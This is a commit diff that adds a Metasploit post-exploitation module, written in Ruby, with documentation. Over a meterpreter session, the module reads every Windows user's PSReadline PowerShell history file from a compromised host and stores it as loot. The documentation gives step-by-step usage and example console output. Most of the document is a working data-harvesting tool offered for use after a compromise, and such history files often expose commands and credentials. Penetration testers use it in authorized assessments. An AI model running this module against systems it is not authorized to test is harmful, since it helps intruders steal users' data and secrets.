Land #11157, Add Windows Gather Power Shell History module

documentation/modules/post/windows/gather/psreadline_history.md

@@ -0,0 +1,48 @@
+## Vulnerable Application
+
+  This post-exploitation module will extract PowerShell history.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get meterpreter session
+  3. Do: `use post/windows/gather/psreadline_history`
+  4. Do: `set SESSION <session id>`
+  5. Do: `run`
+  6. You should be able to see the extracted PowerShell history in the loot files
+
+## Options
+
+  - **SESSION** - The session to run the module on.
+
+## Example Scenario
+
+  **Using the module with a version earlier than PowerShell 5.0**
+
+  In this scenario the module won't be able to work, as in earlier versions of PowerShell, the history of the commands in the current session is not being saved after it is closed.
+
+  **Using the module with PowerShell 5.0+**
+
+  In this scenario the module will try to extract the history file and save it in a loot file.
+
+  ```
+  msf exploit(handler) > use post/windows/gather/psreadline_history 
+  msf post(psreadline_history) > set SESSION 1
+  SESSION => 1
+  msf post(psreadline_history) > run
+
+  [*] Writing history to loot...
+  [*] PSReadline history file of user IEUser saved to /home/user/.msf4/loot/20181223050921_default_10.0.2.15_ps.history_688257.txt
+  [*] Post module execution completed
+  ```
+
+  The extracted history data would look like this:
+
+  ```
+  cd
+  cls
+  1+5
+  Get-Help -Name Get-*
+  Set-ExecutionPolicy Unrestricted
+  Get-Service | Export-CSV c:\service.csv
+  ```

modules/post/windows/gather/psreadline_history.rb

@@ -0,0 +1,51 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/windows/user_profiles'
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Windows Gather PSReadline History',
+      'Description' => %q{
+        Gathers Power Shell history data from the target machine.
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [
+        'Garvit Dewan <d.garvit[at]gmail.com>' # @dgarvit
+      ],
+      'Platform' => %w{ win },
+      'SessionTypes' => [ 'meterpreter' ],
+      'References'   => [
+        ['URL', 'https://docs.microsoft.com/en-us/powershell/module/psreadline/'],
+        ['URL', 'https://github.com/KalibRx/PoshHarvestPy/blob/master/poshharvest.py'],
+        ['URL', 'https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html']
+      ]
+    ))
+  end
+
+  def run
+    grab_user_profiles.each do |userprofile|
+      next if userprofile['AppData'].blank?
+      history_path = userprofile['AppData'] + "\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt"
+      next unless file?(history_path)
+      gather_psreadline_history(userprofile['UserName'], history_path)
+    end
+  end
+
+  #
+  # Get the PSReadline history file.
+  #
+  def gather_psreadline_history(username, path)
+    data = read_file(path)
+    print_status("Writing history to loot...")
+    file_loc = store_loot("ps.history", "text/plain", session, data)
+    print_good("PSReadline history file of user #{username} saved to #{file_loc}")
+  end
+end